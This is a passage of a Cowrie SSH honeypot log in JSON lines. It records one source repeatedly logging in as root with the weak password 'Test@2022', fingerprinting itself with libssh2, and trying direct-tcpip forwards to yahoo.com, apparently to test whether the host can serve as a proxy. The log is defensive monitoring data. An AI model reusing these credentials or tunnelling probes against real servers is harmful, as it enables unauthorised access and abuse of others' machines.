,"aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.172368Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.407815Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30171,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30171","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.456451Z","session":"7e1df4d32223"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.504002Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29852,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29852","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.641525Z","session":"7e1df4d32223"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.665128Z","src_ip":"212.227.125.160","session":"303af360e88f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.688645Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.736675Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55608,"dst_ip":"1.2.3.4","dst_port":22,"session":"736f692b8c54","protocol":"ssh","message":"New connection: 213.209.150.239:55608 (1.2.3.4:22) [session: 736f692b8c54]","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.782902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.783538Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.831030Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.066292Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11175,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11175","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.114917Z","session":"736f692b8c54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.162129Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21482,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21482","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.297702Z","session":"736f692b8c54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.345023Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.393615Z","src_ip":"213.209.150.239","session":"736f692b8c54"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55645,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4a1a62b3658","protocol":"ssh","message":"New connection: 213.209.150.239:55645 (1.2.3.4:22) [session: d4a1a62b3658]","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.439933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.440634Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.488083Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.723130Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":18026,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18026","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.771115Z","session":"d4a1a62b3658"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.818356Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25255,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25255","sensor":"my-vps","timestamp":"2025-08-26T00:56:20.953681Z","session":"d4a1a62b3658"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.001977Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.050219Z","src_ip":"213.209.150.239","session":"d4a1a62b3658"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55697,"dst_ip":"1.2.3.4","dst_port":22,"session":"506fcd11407e","protocol":"ssh","message":"New connection: 213.209.150.239:55697 (1.2.3.4:22) [session: 506fcd11407e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.105915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.115939Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.163050Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.446126Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21799,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21799","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.504017Z","session":"506fcd11407e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.562173Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10011,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10011","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.719142Z","session":"506fcd11407e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.775868Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.833190Z","src_ip":"213.209.150.239","session":"506fcd11407e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55761,"dst_ip":"1.2.3.4","dst_port":22,"session":"c22aa8d87b54","protocol":"ssh","message":"New connection: 213.209.150.239:55761 (1.2.3.4:22) [session: c22aa8d87b54]","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.879339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.879997Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:21.927188Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.162088Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2182,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2182","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.210211Z","session":"c22aa8d87b54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.257718Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4179,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4179","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.393476Z","session":"c22aa8d87b54"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.440592Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.489310Z","src_ip":"213.209.150.239","session":"c22aa8d87b54"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55815,"dst_ip":"1.2.3.4","dst_port":22,"session":"35d985c912c2","protocol":"ssh","message":"New connection: 213.209.150.239:55815 (1.2.3.4:22) [session: 35d985c912c2]","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.534639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.535849Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.582944Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.817450Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18986,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18986","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.865455Z","session":"35d985c912c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:22.912793Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":26648,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26648","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.049605Z","session":"35d985c912c2"}
